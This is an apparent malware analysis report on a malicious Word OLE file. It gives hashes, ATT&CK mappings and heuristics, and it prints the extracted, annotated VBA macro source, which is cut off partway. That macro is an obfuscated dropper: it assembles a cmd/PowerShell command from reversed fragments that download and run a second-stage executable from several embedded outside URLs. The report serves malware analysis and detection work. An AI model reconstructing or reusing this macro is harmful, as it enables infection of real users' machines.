Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 207cd5d26315337d…

MALICIOUS

Office (OLE)

73.9 KB Created: 2018-09-12 00:25:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: d85200ac81978b2ddd72a62a82000ed0 SHA-1: d3620872ff7b2aa9a1e833b0de5f791937b3c9d5 SHA-256: 207cd5d26315337dbc72a6cb7213760d8ae0563e63f0ba4b6c07f537fab87ea6
62 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OLE document containing VBA macros. The macros are heavily obfuscated but appear to construct and execute a command-line string. This command likely downloads and executes a second-stage payload, as indicated by the strings 'download' and 'execute' in the reconstructed command. The OLE slack-space anomaly also suggests obfuscation or padding within the file structure.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 75,648 bytes but its declared streams total only 36,671 bytes — 38,977 bytes (52%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) carried each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4875 bytes
SHA-256: 90ed7057cafd630fde4997d068ea88e6eed83b418a2dd667e7b56a2ebd0a2d81
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "huwGkBsrEXwa"
' Builds and returns (via the `azqEFNOHO = ...` assignment near the end) one long
' obfuscated command-line string assembled from twelve fragment variables.
' Takes no parameters. Nothing in this function executes the string; the
' execution site is not in this excerpt.
' Every `VarType "..." + "..."` statement is filler: the call's return value is
' discarded, so these lines do nothing at runtime and exist only to dilute
' signatures and pad the code.
Function azqEFNOHO()

' Suppress all runtime errors so a failing step never raises a dialog.
' Spread over line continuations (_) so the statement does not match a
' plain-text "On Error Resume Next" signature.
On _
Error _
Resume _
Next
VarType "iIcudkjzsWjS" + "tY"
   VarType "JS" + "215112845"
   VarType "151846085" + "2066"
   VarType "zPfKo" + "52642209"
' Chr(6+5+10+1+77) = Chr(99) = "c", Chr(4+3+7+0+53) = Chr(67) = "C",
' Chr(2+1+3+0+28) = Chr(34) = a double quote; the arithmetic keeps the literal
' characters out of the source text. With "md /V" this fragment opens a cmd.exe
' invocation (/V = delayed environment-variable expansion, /C = run the quoted
' command). The ^ characters are cmd escape characters that the shell strips at
' parse time, so they are pure obfuscation.
wqLkCG = Format(Chr(6 + 5 + 10 + 1 + 77)) + "md /V" + "/" + Format(Chr(4 + 3 + 7 + 0 + 53)) + Format(Chr(2 + 1 + 3 + 0 + 28)) + "^s^" + "et ^" + "Z^eqH"
VarType "115539891" + "sWChbsGsSR"
   VarType "Qu" + "wRFQ" + "4327" + "3649"
' From here on the fragments look character-reversed (this line contains
' "kaer" + "b", i.e. "break" backwards); the step that reverses the joined string
' is not in this excerpt — NOTE(review): confirm against the rest of the module.
SvczZoXnI = "=  ^  " + "   " + " ^ ^ ^" + "   " + "^    " + "^" + "}^}{h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "t^a" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "}^;" + "kaer" + "b" + "^;^m" + "N^l$^" + " me"
VarType "HP" + "hO"
   VarType "RI" + "vNzURQiwZaWpBh" + "9485" + "nkRPbYGpZO"
   VarType "mU" + "mEujjiJ" + "5140" + "BBtVq"
KGtjiTBImIP = "tI^-e^k" + "^ovn" + "I;)mNl$" + "^ ," + "XX^" + "l$(^eli" + "F^d^a^" + "o^ln" + "woD^." + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^"
VarType "nnRvRAEdM" + "321248922" + "132547621" + "57585535"
   VarType "j" + "8410" + "234824351" + "oY"
   VarType "182405393" + "pw" + "7551" + "250379215"
cldvYznrivc = "B^M$^{y" + "rt{" + ")" + Format(Chr(4 + 3 + 7 + 0 + 53)) + "o" + "^j$^ n" + "i^ " + "X^X^l^" + "$" + "("
VarType "ECrD" + "5147" + "DMwXclBXo" + "VYETzdBlXOpPhF"
   VarType "6514" + "G" + "wCNLrGm" + "521965617"
   VarType "DPU" + "GM"
kahbWRok = "^h" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "aero^" + "f^;" + "^'ex^" + "e^.^'+^" + "X^h^z"
VarType "TKMQSEQcI" + "r" + "3657" + "375034381"
   VarType "DRT" + "roisOdtH"
   VarType "687" + "uEJiLLnAuNYd" + "XaNOpS" + "T"
nulzKfAO = "^$^+'\" + "^'" + "^+" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^" + "i^l^" + "b^u^p:" + "v" + "n^e^" + "$"
VarType "QUK" + "8843"
   VarType "FNrW" + "175601914"
   VarType "QqwX" + "9975" + "1900" + "4904"
JMAVGSbzEW = "=mN^l$^" + ";'" + "^024" + "'^ =^" + " ^" + "Xh^z" + "^$;)^'" + "^@^'(^" + "ti^l^p"
VarType "aGSq" + "GnvS"
   VarType "mLcXjW" + "2247"
   VarType "Hh" + "7114" + "fGlAORaJQ" + "9283"
LboFQJrT = "S" + ".^'TT1" + "q^2/" + "^lp" + "." + "ta^iw" + "^k" + "^-or^" + "u" + "e//"
VarType "293900752" + "1323"
   VarType "GTYkk" + "X"
' The repeated "//:^p" / "p^t^t^h" pieces on this and the following fragment
' lines are the reversed, caret-laced form of URL schemes — a useful detection
' hook for reversed-string download cradles.
DCtUQbtLO = ":" + "p^t^t^h" + "@" + "mVZ" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "R/^" + "t^" + "en.^s" + "r^" + "ot" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "a" + "r"
VarType "ruMkX" + "ud" + "275244492" + "jWD"
   VarType "w" + "9095"
   VarType "201722938" + "nUwSqvBr" + "1282" + "BhiEj"
   VarType "8242" + "WT"
   VarType "b" + "SZFrmTE" + "MHoNPRu" + "VIB"
aALVIVA = "^tn" + "^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "^-eg^" + "atireh/" + "/:^p" + "^t^" + "t^h" + "@l^B^y^" + "A/^" + "m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + "." + "om^hs" + "^a^ml" + "a^p"
VarType "ic" + "CU" + "aVjH" + "wE"
   VarType "w" + "GRVL" + "514313996" + "WwPMrRc"
OmiquzS = "s^alle" + "t^o^h/" + "/:^" + "pt^th^@" + "E/^"
VarType "7801" + "moRi" + "lb" + "uXA"
   VarType "wPfiYk" + "239530499"
   VarType "335836338" + "Dh" + "RaZAzBWi" + "uRtqU"
   VarType "6677" + "280806553"
oPSDYHhcc = "mo" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".ss^e" + Format(Chr(6 + 5 + 10 + 1 + 77)) + Format(Chr(6 + 5 + 10 + 1 + 77)) + "u^s" + "^g" + "n^ill^" + "es^dl" + "^o^g//" + ":^p"
' Return value: the twelve fragments joined in declaration order. Assigning to
' the function name is how VBA sets a Function's result.
azqEFNOHO = wqLkCG + SvczZoXnI + KGtjiTBImIP + cldvYznrivc + kahbWRok + nulzKfAO + JMAVGSbzEW + LboFQJrT + DCtUQbtLO + aALVIVA + OmiquzS + oPSDYHhcc
   VarType "1237" + "vFlqfIkrl" + "AYCRj" + "LNJjnUfTDzSU"
   VarType "192742861" + "250622389"
   VarType "148" + "F"
End Function
Function NYuGNFE()

On _
Error _
Resume _
Next
VarType "fh" + "YJbp"
   VarType "HdCvwWrOHMA" + "Z" + "OcXBFhkaq" + "TD"
   VarType "8170" + "TO"
   VarType "7652" + "451040733" + "M" + "cfz"
   VarType "vjKaZSmjpQXUk" + "579" + "445337301" + "MVoB"
VdkoHlZj = "t" + "^th@3^" + "EU" + "^Z" + "^" + "Wu/^m^o" + Format(Chr(6 + 5 + 10 + 1 + 77)) + ".s^b^a" + "l^-l3" + "//:" + "^p^t" + "^th"
VarType "zmvIEjm" + "504124773" + "132529308" + "215997801"
   VarType "tzHkl" + "hjXMwwJXBHLCO"
   VarType "WRSYCmSj" + "iDaY" + "cPSul" + "282961178"
jjjLiHwBnXY = "^'=" + For
... (truncated)